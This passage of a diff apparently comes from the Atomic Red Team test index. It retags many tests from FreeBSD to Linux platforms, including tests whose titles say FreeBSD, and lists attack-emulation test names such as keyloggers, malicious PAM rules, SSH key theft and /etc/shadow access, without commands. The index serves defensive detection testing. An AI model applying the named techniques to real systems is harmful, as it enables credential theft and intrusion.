COR_PROFILER](../../T1574.012/T1574.012.md) - Atomic Test #1: User scope COR_PROFILER [windows] - Atomic Test #2: System Scope COR_PROFILER [windows] @@ -1733,7 +1733,7 @@ - T1205.002 Socket Filters [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - [T1132.001 Data Encoding: Standard Encoding](../../T1132.001/T1132.001.md) - Atomic Test #1: Base64 Encoded data. [macos, linux] - - Atomic Test #2: Base64 Encoded data (freebsd) [freebsd] + - Atomic Test #2: Base64 Encoded data (freebsd) [linux] - Atomic Test #3: XOR Encoded data. [windows] - T1568.002 Domain Generation Algorithms [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - [T1071.004 Application Layer Protocol: DNS](../../T1071.004/T1071.004.md) @@ -1785,11 +1785,11 @@ - Atomic Test #2: Tor Proxy Usage - Windows [windows] - Atomic Test #3: Tor Proxy Usage - Debian/Ubuntu [linux] - Atomic Test #4: Tor Proxy Usage - MacOS [macos] - - Atomic Test #5: Tor Proxy Usage - FreeBSD [freebsd] + - Atomic Test #5: Tor Proxy Usage - FreeBSD [linux] - T1001 Data Obfuscation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - [T1571 Non-Standard Port](../../T1571/T1571.md) - Atomic Test #1: Testing usage of uncommonly used port with PowerShell [windows] - - Atomic Test #2: Testing usage of uncommonly used port [freebsd, linux, macos] + - Atomic Test #2: Testing usage of uncommonly used port [linux, macos] - [T1573 Encrypted Channel](../../T1573/T1573.md) - Atomic Test #1: OpenSSL C2 [windows] - T1102.002 Bidirectional Communication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) @@ -1806,14 +1806,14 @@ - [T1071.001 Application Layer Protocol: Web Protocols](../../T1071.001/T1071.001.md) - Atomic Test #1: Malicious User Agents - Powershell [windows] - Atomic Test #2: Malicious User Agents - CMD [windows] - - Atomic Test #3: Malicious User Agents - Nix [freebsd, linux, macos] + - Atomic Test #3: Malicious User Agents - Nix [linux, macos] - [T1105 Ingress Tool Transfer](../../T1105/T1105.md) - - Atomic Test #1: rsync remote file copy (push) [freebsd, linux, macos] - - Atomic Test #2: rsync remote file copy (pull) [freebsd, linux, macos] - - Atomic Test #3: scp remote file copy (push) [freebsd, linux, macos] - - Atomic Test #4: scp remote file copy (pull) [freebsd, linux, macos] - - Atomic Test #5: sftp remote file copy (push) [freebsd, linux, macos] - - Atomic Test #6: sftp remote file copy (pull) [freebsd, linux, macos] + - Atomic Test #1: rsync remote file copy (push) [linux, macos] + - Atomic Test #2: rsync remote file copy (pull) [linux, macos] + - Atomic Test #3: scp remote file copy (push) [linux, macos] + - Atomic Test #4: scp remote file copy (pull) [linux, macos] + - Atomic Test #5: sftp remote file copy (push) [linux, macos] + - Atomic Test #6: sftp remote file copy (pull) [linux, macos] - Atomic Test #7: certutil download (urlcache) [windows] - Atomic Test #8: certutil download (verifyctl) [windows] - Atomic Test #9: Windows - BITSAdmin BITS Download [windows] @@ -1821,7 +1821,7 @@ - Atomic Test #11: OSTAP Worming Activity [windows] - Atomic Test #12: svchost writing a file to a UNC path [windows] - Atomic Test #13: Download a File with Windows Defender MpCmdRun.exe [windows] - - Atomic Test #14: whois file download [freebsd, linux, macos] + - Atomic Test #14: whois file download [linux, macos] - Atomic Test #15: File Download via PowerShell [windows] - Atomic Test #16: File download with finger.exe on Windows [windows] - Atomic Test #17: Download a file with IMEWDBLD.exe [windows] @@ -1840,7 +1840,7 @@ - T1001.002 Steganography [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - T1008 Fallback Channels [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - [T1090.001 Proxy: Internal Proxy](../../T1090.001/T1090.001.md) - - Atomic Test #1: Connection Proxy [freebsd, macos, linux] + - Atomic Test #1: Connection Proxy [linux, macos] - Atomic Test #2: Connection Proxy for macOS UI [macos] - Atomic Test #3: portproxy reg key [windows] - T1094 Custom Command and Control Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) @@ -1855,17 +1855,17 @@ - Atomic Test #3: Compress Data and lock with password for Exfiltration with winzip [windows] - Atomic Test #4: Compress Data and lock with password for Exfiltration with 7zip [windows] - Atomic Test #5: Data Compressed - nix - zip [linux, macos] - - Atomic Test #6: Data Compressed - nix - gzip Single File [freebsd, linux, macos] - - Atomic Test #7: Data Compressed - nix - tar Folder or File [freebsd, linux, macos] - - Atomic Test #8: Data Encrypted with zip and gpg symmetric [freebsd, macos, linux] + - Atomic Test #6: Data Compressed - nix - gzip Single File [linux, macos] + - Atomic Test #7: Data Compressed - nix - tar Folder or File [linux, macos] + - Atomic Test #8: Data Encrypted with zip and gpg symmetric [linux, macos] - Atomic Test #9: Encrypts collected data with AES-256 and Base64 [linux, macos] - [T1113 Screen Capture](../../T1113/T1113.md) - Atomic Test #1: Screencapture [macos] - Atomic Test #2: Screencapture (silent) [macos] - Atomic Test #3: X Windows Capture [linux] - - Atomic Test #4: X Windows Capture (freebsd) [freebsd] + - Atomic Test #4: X Windows Capture (freebsd) [linux] - Atomic Test #5: Capture Linux Desktop using Import Tool [linux] - - Atomic Test #6: Capture Linux Desktop using Import Tool (freebsd) [freebsd] + - Atomic Test #6: Capture Linux Desktop using Import Tool (freebsd) [linux] - Atomic Test #7: Windows Screencapture [windows] - Atomic Test #8: Windows Screen Capture (CopyFromScreen) [windows] - T1557 Adversary-in-the-Middle [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) @@ -1873,8 +1873,8 @@ - Atomic Test #1: Input Capture [windows] - Atomic Test #2: Living off the land Terminal Input Capture on Linux with pam.d [linux] - Atomic Test #3: Logging bash history to syslog [linux] - - Atomic Test #4: Logging sh history to syslog/messages [freebsd] - - Atomic Test #5: Bash session based keylogger [freebsd, linux] + - Atomic Test #4: Logging sh history to syslog/messages [linux] + - Atomic Test #5: Bash session based keylogger [linux] - Atomic Test #6: SSHD PAM keylogger [linux] - Atomic Test #7: Auditd keylogger [linux] - Atomic Test #8: MacOS Swift Keylogger [macos] @@ -1890,7 +1890,7 @@ - [T1074.001 Data Staged: Local Data Staging](../../T1074.001/T1074.001.md) - Atomic Test #1: Stage data from Discovery.bat [windows] - Atomic Test #2: Stage data from Discovery.sh [linux, macos] - - Atomic Test #3: Stage data from Discovery.sh (freebsd) [freebsd] + - Atomic Test #3: Stage data from Discovery.sh (freebsd) [linux] - Atomic Test #4: Zip a Folder with PowerShell for Staging in Temp [windows] - [T1114.001 Email Collection: Local Email Collection](../../T1114.001/T1114.001.md) - Atomic Test #1: Email Collection with PowerShell Get-Inbox [windows] @@ -1913,10 +1913,10 @@ - [T1005 Data from Local System](../../T1005/T1005.md) - Atomic Test #1: Search files of interest and save them to a single zip file (Windows) [windows] - [T1560.002 Archive Collected Data: Archive via Library](../../T1560.002/T1560.002.md) - - Atomic Test #1: Compressing data using GZip in Python (FreeBSD/Linux) [freebsd, linux] - - Atomic Test #2: Compressing data using bz2 in Python (FreeBSD/Linux) [freebsd, linux] - - Atomic Test #3: Compressing data using zipfile in Python (FreeBSD/Linux) [freebsd, linux] - - Atomic Test #4: Compressing data using tarfile in Python (FreeBSD/Linux) [freebsd, linux] + - Atomic Test #1: Compressing data using GZip in Python (FreeBSD/Linux) [linux] + - Atomic Test #2: Compressing data using bz2 in Python (FreeBSD/Linux) [linux] + - Atomic Test #3: Compressing data using zipfile in Python (FreeBSD/Linux) [linux] + - Atomic Test #4: Compressing data using tarfile in Python (FreeBSD/Linux) [linux] - T1602.002 Network Device Configuration Dump [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - [T1560 Archive Collected Data](../../T1560/T1560.md) - Atomic Test #1: Compress Data for Exfiltration With PowerShell [windows] @@ -2010,14 +2010,14 @@ - T1557 Adversary-in-the-Middle [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - [T1556.003 Modify Authentication Process: Pluggable Authentication Modules](../../T1556.003/T1556.003.md) - Atomic Test #1: Malicious PAM rule [linux] - - Atomic Test #2: Malicious PAM rule (freebsd) [freebsd] + - Atomic Test #2: Malicious PAM rule (freebsd) [linux] - Atomic Test #3: Malicious PAM module [linux] - [T1056.001 Input Capture: Keylogging](../../T1056.001/T1056.001.md) - Atomic Test #1: Input Capture [windows] - Atomic Test #2: Living off the land Terminal Input Capture on Linux with pam.d [linux] - Atomic Test #3: Logging bash history to syslog [linux] - - Atomic Test #4: Logging sh history to syslog/messages [freebsd] - - Atomic Test #5: Bash session based keylogger [freebsd, linux] + - Atomic Test #4: Logging sh history to syslog/messages [linux] + - Atomic Test #5: Bash session based keylogger [linux] - Atomic Test #6: SSHD PAM keylogger [linux] - Atomic Test #7: Auditd keylogger [linux] - Atomic Test #8: MacOS Swift Keylogger [macos] @@ -2028,7 +2028,7 @@ - Atomic Test #4: Password Brute User using Kerbrute Tool [windows] - Atomic Test #5: SUDO Brute Force - Debian [linux] - Atomic Test #6: SUDO Brute Force - Redhat [linux] - - Atomic Test #7: SUDO Brute Force - FreeBSD [freebsd] + - Atomic Test #7: SUDO Brute Force - FreeBSD [linux] - [T1003 OS Credential Dumping](../../T1003/T1003.md) - Atomic Test #1: Gsecdump [windows] - Atomic Test #2: Credential Dumping with NPPSpy [windows] @@ -2066,13 +2066,13 @@ - T1214 Credentials in Registry [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - [T1003.007 OS Credential Dumping: Proc Filesystem](../../T1003.007/T1003.007.md) - Atomic Test #1: Dump individual process memory with sh (Local) [linux] - - Atomic Test #2: Dump individual process memory with sh on FreeBSD (Local) [freebsd] - - Atomic Test #3: Dump individual process memory with Python (Local) [freebsd, linux] + - Atomic Test #2: Dump individual process memory with sh on FreeBSD (Local) [linux] + - Atomic Test #3: Dump individual process memory with Python (Local) [linux] - Atomic Test #4: Capture Passwords with MimiPenguin [linux] - T1555.005 Password Managers [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - [T1040 Network Sniffing](../../T1040/T1040.md) - Atomic Test #1: Packet Capture Linux using tshark or tcpdump [linux] - - Atomic Test #2: Packet Capture FreeBSD using tshark or tcpdump [freebsd] + - Atomic Test #2: Packet Capture FreeBSD using tshark or tcpdump [linux] - Atomic Test #3: Packet Capture macOS using tcpdump or tshark [macos] - Atomic Test #4: Packet Capture Windows Command Prompt [windows] - Atomic Test #5: Windows Internal Packet Capture [windows] @@ -2080,8 +2080,8 @@ - Atomic Test #7: Windows Internal pktmon set filter [windows] - Atomic Test #8: Packet Capture macOS using /dev/bpfN with sudo [macos] - Atomic Test #9: Filtered Packet Capture macOS using /dev/bpfN with sudo [macos] - - Atomic Test #10: Packet Capture FreeBSD using /dev/bpfN with sudo [freebsd] - - Atomic Test #11: Filtered Packet Capture FreeBSD using /dev/bpfN with sudo [freebsd] + - Atomic Test #10: Packet Capture FreeBSD using /dev/bpfN with sudo [linux] + - Atomic Test #11: Filtered Packet Capture FreeBSD using /dev/bpfN with sudo [linux] - Atomic Test #12: Packet Capture Linux socket AF_PACKET,SOCK_RAW with sudo [linux] - Atomic Test #13: Packet Capture Linux socket AF_INET,SOCK_RAW,TCP with sudo [linux] - Atomic Test #14: Packet Capture Linux socket AF_INET,SOCK_PACKET,UDP with sudo [linux] @@ -2131,13 +2131,13 @@ - T1557.003 DHCP Spoofing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - [T1552.004 Unsecured Credentials: Private Keys](../../T1552.004/T1552.004.md) - Atomic Test #1: Private Keys [windows] - - Atomic Test #2: Discover Private SSH Keys [freebsd, macos, linux] + - Atomic Test #2: Discover Private SSH Keys [linux, macos] - Atomic Test #3: Copy Private SSH Keys with CP [linux] - - Atomic Test #4: Copy Private SSH Keys with CP (freebsd) [freebsd] + - Atomic Test #4: Copy Private SSH Keys with CP (freebsd) [linux] - Atomic Test #5: Copy Private SSH Keys with rsync [macos, linux] - - Atomic Test #6: Copy Private SSH Keys with rsync (freebsd) [freebsd] + - Atomic Test #6: Copy Private SSH Keys with rsync (freebsd) [linux] - Atomic Test #7: Copy the users GnuPG directory with rsync [macos, linux] - - Atomic Test #8: Copy the users GnuPG directory with rsync (freebsd) [freebsd] + - Atomic Test #8: Copy the users GnuPG directory with rsync (freebsd) [linux] - Atomic Test #9: ADFS token signing and encryption certificates theft - Local [windows] - Atomic Test #10: ADFS token signing and encryption certificates theft - Remote [windows] - Atomic Test #11: CertUtil ExportPFX [windows] @@ -2181,14 +2181,14 @@ - Atomic Test #1: Staging Local Certificates via Export-Certificate [windows] - [T1552.003 Unsecured Credentials: Bash History](../../T1552.003/T1552.003.md) - Atomic Test #1: Search Through Bash History [linux, macos] - - Atomic Test #2: Search Through sh History [freebsd] + - Atomic Test #2: Search Through sh History [linux] - [T1552.001 Unsecured Credentials: Credentials In Files](../../T1552.001/T1552.001.md) - - Atomic Test #1: Find AWS credentials [freebsd, macos, linux] + - Atomic Test #1: Find AWS credentials [macos, linux] - Atomic Test #2: Extract Browser and System credentials with LaZagne [macos] - - Atomic Test #3: Extract passwords with grep [freebsd, macos, linux] + - Atomic Test #3: Extract passwords with grep [linux, macos] - Atomic Test #4: Extracting passwords with findstr [windows] - Atomic Test #5: Access unattend.xml [windows] - - Atomic Test #6: Find and Access Github Credentials [freebsd, macos, linux] + - Atomic Test #6: Find and Access Github Credentials [linux, macos] - Atomic Test #7: WinPwn - sensitivefiles [windows] - Atomic Test #8: WinPwn - Snaffler [windows] - Atomic Test #9: WinPwn - powershellsensitive [windows] @@ -2216,7 +2216,7 @@ - [T1110.004 Brute Force: Credential Stuffing](../../T1110.004/T1110.004.md) - Atomic Test #1: SSH Credential Stuffing From Linux [linux] - Atomic Test #2: SSH Credential Stuffing From MacOS [macos] - - Atomic Test #3: SSH Credential Stuffing From FreeBSD [freebsd] + - Atomic Test #3: SSH Credential Stuffing From FreeBSD [linux] - Atomic Test #4: Brute Force:Credential Stuffing using Kerbrute Tool [windows] - T1208 Kerberoasting [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - T1556.006 Multi-Factor Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) @@ -2229,10 +2229,10 @@ - T1557.002 ARP Cache Poisoning [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - [T1003.008 OS Credential Dumping: /etc/passwd, /etc/master.passwd and /etc/shadow](../../T1003.008/T1003.008.md) - Atomic Test #1: Access /etc/shadow (Local) [linux] - - Atomic Test #2: Access /etc/master.passwd (Local) [freebsd] - - Atomic Test #3: Access /etc/passwd (Local) [freebsd, linux] - - Atomic Test #4: Access /etc/{shadow,passwd,master.passwd} with a standard bin that's not cat [freebsd, linux] - - Atomic Test #5: Access /etc/{shadow,passwd,master.passwd} with shell builtins [freebsd, linux] + - Atomic Test #2: Access /etc/master.passwd (Local) [linux] + - Atomic Test #3: Access /etc/passwd (Local) [linux] + - Atomic Test #4: Access /etc/{shadow,passwd,master.passwd} with a standard bin that's not cat [linux] + - Atomic Test #5: Access /etc/{shadow,passwd,master.passwd} with shell builtins [linux] - [T1558.002 Steal or Forge Kerberos Tickets: Silver Ticket](../../T1558.002/T1558.002.md) - Atomic Test #1: Crafting Active Directory silver tickets with mimikatz [windows] - [T1555.004 Credentials from Password Stores: Windows Credential Manager](../../T1555.004/T1555.004.md) @@ -2273,7 +2273,7 @@ # discovery - [T1033 System Owner/User Discovery](../../T1033/T1033.md) - Atomic Test #1: System Owner/User Discovery [windows] - - Atomic Test #2: System Owner/User Discovery [freebsd, linux, macos] + - Atomic Test #2: System Owner/User Discovery [linux, macos] - Atomic Test #3: Find computers where user has session - Stealth mode (PowerView) [windows] - Atomic Test #4: User Discovery With Env Vars PowerShell Script [windows] - Atomic Test #5: GetCurrent User with PowerShell Script [windows] @@ -2316,20 +2316,20 @@ - Atomic Test #23: Active Directory Domain Search [linux] - T1063 Security Software Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - [T1087.001 Account Discovery: Local Account](../../T1087.001/T1087.001.md) - - Atomic Test #1: Enumerate all accounts (Local) [freebsd, linux] - - Atomic Test #2: View sudoers access [freebsd, linux, macos] - - Atomic Test #3: View accounts with UID 0 [freebsd, linux, macos] - - Atomic Test #4: List opened files by user [freebsd, linux, macos] + - Atomic Test #1: Enumerate all accounts (Local) [linux] + - Atomic Test #2: View sudoers access [linux, macos] + - Atomic Test #3: View accounts with UID 0 [linux, macos] + - Atomic Test #4: List opened files by user [linux, macos] - Atomic Test #5: Show if a user account has ever logged in remotely [linux] - - Atomic Test #6: Show if a user account has ever logged in remotely (freebsd) [freebsd] - - Atomic Test #7: Enumerate users and groups [freebsd, linux, macos] + - Atomic Test #6: Show if a user account has ever logged in remotely (freebsd) [linux] + - Atomic Test #7: Enumerate users and groups [linux, macos] - Atomic Test #8: Enumerate users and groups [macos] - Atomic Test #9: Enumerate all accounts on Windows (Local) [windows] - Atomic Test #10: Enumerate all accounts via PowerShell (Local) [windows] - Atomic Test #11: Enumerate logged on users via CMD (Local) [windows] - [T1497.001 Virtualization/Sandbox Evasion: System Checks](../../T1497.001/T1497.001.md) - Atomic Test #1: Detect Virtualization Environment (Linux) [linux] - - Atomic Test #2: Detect Virtualization Environment (FreeBSD) [freebsd] + - Atomic Test #2: Detect Virtualization Environment (FreeBSD) [linux] - Atomic Test #3: Detect Virtualization Environment (Windows) [windows] - Atomic Test #4: Detect Virtualization Environment (MacOS) [macos] - Atomic Test #5: Detect Virtualization Environment via WMI Manufacturer/Model Listing (Windows) [windows] @@ -2353,10 +2353,10 @@ - Atomic Test #1: System Service Discovery [windows] - Atomic Test #2: System Service Discovery - net.exe [windows] - Atomic Test #3: System Service Discovery - systemctl [linux] - - Atomic Test #4: System Service Discovery - service [freebsd] + - Atomic Test #4: System Service Discovery - service [linux] - [T1040 Network Sniffing](../../T1040/T1040.md) - Atomic Test #1: Packet Capture Linux using tshark or tcpdump [linux] - - Atomic Test #2: Packet Capture FreeBSD using tshark or tcpdump [freebsd] + - Atomic Test #2: Packet Capture FreeBSD using tshark or tcpdump [linux] - Atomic Test #3: Packet Capture macOS using tcpdump or tshark [macos] - Atomic Test #4: Packet Capture Windows Command Prompt [windows] - Atomic Test #5: Windows Internal Packet Capture [windows] @@ -2364,8 +2364,8 @@ - Atomic Test #7: Windows Internal pktmon set filter [windows] - Atomic Test #8: Packet Capture macOS using /dev/bpfN with sudo [macos] - Atomic Test #9: Filtered Packet Capture macOS using /dev/bpfN with sudo [macos] - - Atomic Test #10: Packet Capture FreeBSD using /dev/bpfN with sudo [freebsd] - - Atomic Test #11: Filtered Packet Capture FreeBSD using /dev/bpfN with sudo [freebsd] + - Atomic Test #10: Packet Capture FreeBSD using /dev/bpfN with sudo [linux] + - Atomic Test #11: Filtered Packet Capture FreeBSD using /dev/bpfN with sudo [linux] - Atomic Test #12: Packet Capture Linux socket AF_PACKET,SOCK_RAW with sudo [linux] - Atomic Test #13: Packet Capture Linux socket AF_INET,SOCK_RAW,TCP with sudo [linux] - Atomic Test #14: Packet Capture Linux socket AF_INET,SOCK_PACKET,UDP with sudo [linux] @@ -2373,7 +2373,7 @@ - [T1135 Network Share Discovery](../../T1135/T1135.md) - Atomic Test #1: Network Share Discovery [macos] - Atomic Test #2: Network Share Discovery - linux [linux] - - Atomic Test #3: Network Share Discovery - FreeBSD [freebsd] + - Atomic Test #3: Network Share Discovery - FreeBSD [linux] - Atomic Test #4: Network Share Discovery command prompt [windows] - Atomic Test #5: Network Share Discovery PowerShell [windows] - Atomic Test #6: View available share drives [windows] @@ -2387,16 +2387,16 @@ - [T1082 System Information Discovery](../../T1082/T1082.md) - Atomic Test #1: System Information Discovery [windows] - Atomic Test #2: System Information Discovery [macos] - - Atomic Test #3: List OS Information [freebsd, linux, macos] + - Atomic Test #3: List OS Information [linux, macos] - Atomic Test #4: Linux VM Check via Hardware [linux] - Atomic Test #5: Linux VM Check via Kernel Modules [linux] - - Atomic Test #6: FreeBSD VM Check via Kernel Modules [freebsd] + - Atomic Test #6: FreeBSD VM Check via Kernel Modules [linux] - Atomic Test #7: Hostname Discovery (Windows) [windows] - - Atomic Test #8: Hostname Discovery [freebsd, linux, macos] + - Atomic Test #8: Hostname Discovery [linux, macos] - Atomic Test #9: Windows MachineGUID Discovery [windows] - Atomic Test #10: Griffon Recon [windows] - Atomic Test #11: Environment variables discovery on windows [windows] - - Atomic Test #12: Environment variables discovery on freebsd, macos and linux [freebsd, macos, linux] + - Atomic Test #12: Environment variables discovery on freebsd, macos and linux [linux, macos] - Atomic Test #13: Show System Integrity Protection status (MacOS) [macos] - Atomic Test #14: WinPwn - winPEAS [windows] - Atomic Test #15: WinPwn - itm4nprivesc [windows] @@ -2410,7 +2410,7 @@ - Atomic Test #23: WinPwn - PowerSharpPack - Seatbelt [windows] - Atomic Test #24: Azure Security Scan with SkyArk [azure-ad] - Atomic Test #25: Linux List Kernel Modules [linux] - - Atomic Test #26: FreeBSD List Kernel Modules [freebsd] + - Atomic Test #26: FreeBSD List Kernel Modules [linux] - Atomic Test #27: System Information Discovery with WMIC [windows] - Atomic Test #28: Driver Enumeration using DriverQuery [windows] - Atomic Test #29: System Information Discovery [windows] @@ -2423,10 +2423,10 @@ - [T1580 Cloud Infrastructure Discovery](../../T1580/T1580.md) - Atomic Test #1: AWS - EC2 Enumeration from Cloud Instance [linux, macos, iaas:aws] - [T1217 Browser Bookmark Discovery](../../T1217/T1217.md) - - Atomic Test #1: List Mozilla Firefox Bookmark Database Files on FreeBSD/Linux [freebsd, linux] + - Atomic Test #1: List Mozilla Firefox Bookmark Database Files on FreeBSD/Linux [linux] - Atomic Test #2: List Mozilla Firefox Bookmark Database Files on macOS [macos] - Atomic Test #3: List Google Chrome Bookmark JSON Files on macOS [macos] - - Atomic Test #4: List Google Chromium Bookmark JSON Files on FreeBSD [freebsd] + - Atomic Test #4: List Google Chromium Bookmark JSON Files on FreeBSD [linux] - Atomic Test #5: List Google Chrome / Opera Bookmarks on Windows with powershell [windows] - Atomic Test #6: List Google Chrome / Edge Chromium Bookmarks on Windows with command prompt [windows] - Atomic Test #7: List Mozilla Firefox bookmarks on Windows with command prompt [windows] @@ -2436,7 +2436,7 @@ - Atomic Test #1: System Network Configuration Discovery on Windows [windows] - Atomic Test #2: List Windows Firewall Rules [windows] - Atomic Test #3: System Network Configuration Discovery [macos, linux] - - Atomic Test #4: System Network Configuration Discovery (freebsd) [freebsd] + - Atomic Test #4: System Network Configuration Discovery (freebsd) [linux] - Atomic Test #5: System Network Configuration Discovery (TrickBot Style) [windows] - Atomic Test #6: List Open Egress Ports [windows] - Atomic Test #7: Adfind - Enumerate Active Directory Subnet Objects [windows] @@ -2456,21 +2456,21 @@ - [T1083 File and Directory Discovery](../../T1083/T1083.md) - Atomic Test #1: File and Directory Discovery (cmd.exe) [windows] - Atomic Test #2: File and Directory Discovery (PowerShell) [windows] - - Atomic Test #3: Nix File and Directory Discovery [freebsd, macos, linux] - - Atomic Test #4: Nix File and Directory Discovery 2 [freebsd, macos, linux] + - Atomic Test #3: Nix File and Directory Discovery [linux, macos] + - Atomic Test #4: Nix File and Directory Discovery 2 [linux, macos] - Atomic Test #5: Simulating MAZE Directory Enumeration [windows] - Atomic Test #6: Launch DirLister Executable [windows] - [T1049 System Network Connections Discovery](../../T1049/T1049.md) - Atomic Test #1: System Network Connections Discovery [windows] - Atomic Test #2: System Network Connections Discovery with PowerShell [windows] - - Atomic Test #3: System Network Connections Discovery FreeBSD, Linux & MacOS [freebsd, linux, macos] + - Atomic Test #3: System Network Connections Discovery FreeBSD, Linux & MacOS [linux, macos] - Atomic Test #4: System Discovery using SharpView [windows] - T1497 Virtualization/Sandbox Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - [T1619 Cloud Storage Object Discovery](../../T1619/T1619.md) - Atomic Test #1: AWS S3 Enumeration [iaas:aws] - T1087.004 Cloud Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - [T1057 Process Discovery](../../T1057/T1057.md) - - Atomic Test #1: Process Discovery - ps [freebsd, linux, macos] + - Atomic Test #1: Process Discovery - ps [linux, macos] - Atomic Test #2: Process Discovery - tasklist [windows] - Atomic Test #3: Process Discovery - Get-Process [windows] - Atomic Test #4: Process Discovery - get-wmiObject [windows] @@ -2478,7 +2478,7 @@ - Atomic Test #6: Discover Specific Process - tasklist [windows] - T1497.002 User Activity Based Checks [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - [T1069.001 Permission Groups Discovery: Local Groups](../../T1069.001/T1069.001.md) - - Atomic Test #1: Permission Groups Discovery (Local) [freebsd, macos, linux] + - Atomic Test #1: Permission Groups Discovery (Local) [linux, macos] - Atomic Test #2: Basic Permission Groups Discovery Windows (Local) [windows] - Atomic Test #3: Permission Groups Discovery PowerShell (Local) [windows] - Atomic Test #4: SharpHound3 - LocalAdmin [windows] @@ -2487,7 +2487,7 @@ - Atomic Test #7: Permission Groups Discovery for Containers- Local Groups [containers] - [T1201 Password Policy Discovery](../../T1201/T1201.md) - Atomic Test #1: Examine password complexity policy - Ubuntu [linux] - - Atomic Test #2: Examine password complexity policy - FreeBSD [freebsd] + - Atomic Test #2: Examine password complexity policy - FreeBSD [linux] - Atomic Test #3: Examine password complexity policy - CentOS/RHEL 7.x [linux] - Atomic Test #4: Examine password complexity policy - CentOS/RHEL 6.x [linux] - Atomic Test #5: Examine password expiration policy - All Linux [linux] @@ -2501,10 +2501,10 @@ - [T1614.001 System Location Discovery: System Language Discovery](../../T1614.001/T1614.001.md) - Atomic Test #1: Discover System Language by Registry Query [windows] - Atomic Test #2: Discover System Language with chcp [windows] - - Atomic Test #3: Discover System Language with locale [freebsd, linux] + - Atomic Test #3: Discover System Language with locale [linux] - Atomic Test #4: Discover System Language with localectl [linux] - Atomic Test #5: Discover System Language by locale file [linux] - - Atomic Test #6: Discover System Language by Environment Variable Query [freebsd, linux] + - Atomic Test #6: Discover System Language by Environment Variable Query [linux] - [T1012 Query Registry](../../T1012/T1012.md) - Atomic Test #1: Query Registry [windows] - Atomic Test #2: Query Registry with Powershell cmdlets [windows] @@ -2515,7 +2515,7 @@ - Atomic Test #2: Security Software Discovery - powershell [windows] - Atomic Test #3: Security Software Discovery - ps (macOS) [macos] - Atomic Test #4: Security Software Discovery - ps (Linux) [linux] - - Atomic Test #5: Security Software Discovery - pgrep (FreeBSD) [freebsd] + - Atomic Test #5: Security Software Discovery - pgrep (FreeBSD) [linux] - Atomic Test #6: Security Software Discovery - Sysmon Service [windows] - Atomic Test #7: Security Software Discovery - AV Discovery via WMI [windows] - Atomic Test #8: Security Software Discovery - AV Discovery via Get-CimInstance and Get-WmiObject cmdlets [windows] @@ -2529,15 +2529,15 @@ - Atomic Test #3: Remote System Discovery - nltest [windows] - Atomic Test #4: Remote System Discovery - ping sweep [windows] - Atomic Test #5: Remote System Discovery - arp [windows] - - Atomic Test #6: Remote System Discovery - arp nix [freebsd, linux, macos] - - Atomic Test #7: Remote System Discovery - sweep [freebsd, linux, macos] + - Atomic Test #6: Remote System Discovery - arp nix [linux, macos] + - Atomic Test #7: Remote System Discovery - sweep [linux, macos] - Atomic Test #8: Remote System Discovery - nslookup [windows] - Atomic Test #9: Remote System Discovery - adidnsdump [windows] - Atomic Test #10: Adfind - Enumerate Active Directory Computer Objects [windows] - Atomic Test #11: Adfind - Enumerate Active Directory Domain Controller Objects [windows] - Atomic Test #12: Remote System Discovery - ip neighbour [linux] - Atomic Test #13: Remote System Discovery - ip route [linux] - - Atomic Test #14: Remote System Discovery - netstat [freebsd] + - Atomic Test #14: Remote System Discovery - netstat [linux] - Atomic Test #15: Remote System Discovery - ip tcp_metrics [linux] - Atomic Test #16: Enumerate domain computers within Active Directory using DirectorySearcher [windows] - Atomic Test #17: Enumerate Active Directory Computers with Get-AdComputer [windows] @@ -2548,7 +2548,7 @@ - [T1046 Network Service Discovery](../../T1046/T1046.md) - Atomic Test #1: Port Scan [linux, macos] - Atomic Test #2: Port Scan Nmap [linux, macos] - - Atomic Test #3: Port Scan Nmap for FreeBSD [freebsd] + - Atomic Test #3: Port Scan Nmap for FreeBSD [linux] - Atomic Test #4: Port Scan NMap for Windows [windows] - Atomic Test #5: Port Scan using python [windows] - Atomic Test #6: WinPwn - spoolvulnscan [windows] @@ -2569,7 +2569,7 @@ - [T1124 System Time Discovery](../../T1124/T1124.md) - Atomic Test #1: System Time Discovery [windows] - Atomic Test #2: System Time Discovery - PowerShell [windows] - - Atomic Test #3: System Time Discovery in FreeBSD/macOS [freebsd, macos] + - Atomic Test #3: System Time Discovery in FreeBSD/macOS [linux, macos] - Atomic Test #4: System Time Discovery W32tm as a Delay [windows] - Atomic Test #5: System Time with Windows time Command [windows] @@ -2699,10 +2699,10 @@ - Atomic Test #7: Azure AD - Delete user via Azure AD PowerShell [azure-ad] - Atomic Test #8: Azure AD - Delete user via Azure CLI [azure-ad] - [T1486 Data Encrypted for Impact](../../T1486/T1486.md) - - Atomic Test #1: Encrypt files using gpg (FreeBSD/Linux) [freebsd, linux] - - Atomic Test #2: Encrypt files using 7z (FreeBSD/Linux) [freebsd, linux] - - Atomic Test #3: Encrypt files using ccrypt (FreeBSD/Linux) [freebsd, linux] - - Atomic Test #4: Encrypt files using openssl 